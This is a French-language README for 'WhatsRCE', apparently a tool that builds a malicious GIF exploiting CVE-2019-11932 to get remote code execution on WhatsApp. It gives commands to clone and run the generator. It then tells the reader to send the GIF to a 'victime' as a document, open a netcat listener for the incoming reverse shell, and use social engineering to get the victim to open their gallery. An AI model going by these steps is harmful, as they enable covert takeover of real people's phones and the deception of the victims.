WhatsRCE
Il s'agit d'un générateur automatisé de payload pour CVE-2019-11932 (Exécution de code à distance sur WhatsApp)
- Installation automatique de GCC (commande sans danger, vous pouvez voir que c'est open-source)
- Enregistrement dans un fichier .GIF
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
- Il vous suffit d'envoyer le fichier .GIF à la victime EN TANT QUE DOCUMENT ET NON COMME IMAGE
- Et de configurer nc / netcat sur le port que vous avez défini dans l'outil WhatsRCE {nc -lnvp votre_port}
- Vous pouvez utiliser une attaque d'ingénierie sociale pour que les victimes soient attirées et lancent cet exploit
- Dites à la victime d'ouvrir la galerie via WhatsApp et demandez-lui d'envoyer des photos (pas nécessaire, il suffit d'aller dans la galerie, aucun problème) après quelques secondes, vous recevrez une connexion shell de la victime
ou regardez simplement cette vidéo
VIDÉO DE DÉMONSTRATION
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
si le lien ci-dessus n'est pas accessible
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK